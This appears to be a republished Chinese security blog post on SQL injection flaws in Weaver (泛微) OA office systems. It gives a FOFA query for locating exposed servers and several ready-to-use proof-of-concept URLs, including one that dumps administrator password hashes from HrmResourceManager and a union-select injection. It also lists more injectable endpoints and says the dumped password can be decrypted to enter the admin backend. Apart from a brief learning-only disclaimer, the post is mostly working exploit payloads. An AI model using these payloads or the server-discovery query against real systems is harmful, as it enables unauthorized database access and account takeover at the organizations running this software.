2021年進入網絡安全行業，作為網絡安全的小白，分享一些自學基礎教程給大家。希望在自己能體系化的總結自己已有的知識的同時，能對各位博友有所幫助。文章內容比較基礎，都是參考了很多大神的文章，各位不喜勿噴，謝謝！如果文章對您有幫助，將是我創作的最大動力！
工作中遇到的漏洞，記錄一下，本文僅作學習之用，請勿進行網絡犯罪，遵守《網絡安全法》等相關法律法規。

漏洞描述

泛微OA不同版本都存在SQL注入漏洞

FOFA

app=“泛微-協同辦公OA”

漏洞復現

1、泛微OA V8 SQL注入漏洞

POC

http://xxx.xxx.xxx.xxx/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager

返回了數據庫第一條記錄的值
通過解密后，可以登錄后臺（漏洞原理可參考附錄文章）

2、泛微OA某版本的SQL注入漏洞（核實中）

POC

http://xxx.xxx.xxx.xxx/Api/portal/elementEcodeAddon/getSqlData?sql=select%20user

3、后臺SQL注入

使用測試賬戶登錄，然后訪問

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=123&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

其中的CONTENT_ID參數能夠注射SQL語句。

http://xx.cn:8028/general/file_folder/file_new/neworedit/index.php?FILE_SORT=&CONTENT_ID=-4%20union%20select%201,2,3,4,5,version(),7,8,9,10,11,12,13,14,15,16,17,18,19%23&SORT_ID=166&func_id=&operationType=editFromRead&docStr=

管理員情況下的注入：

http://www.e-cology.cn/systeminfo/sysadmin/sysadminEdit.jsp?id=1

普通用戶注入:

http://xx.cn//cowork/CoworkLogView.jsp?id=151

普通用戶注入地址：

http://xx.cn/system/basedata/basedata_role.jsp?roleid=32

普通用戶注入地址：

http://xx.cn//system/basedata/basedata_hrm.jsp?resourceid=3

繼續收集中，未完待續…

參考文章

泛微OA V8 SQL注入漏洞

總結

以上是生活随笔為你收集整理的泛微OA-SQL注入漏洞的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。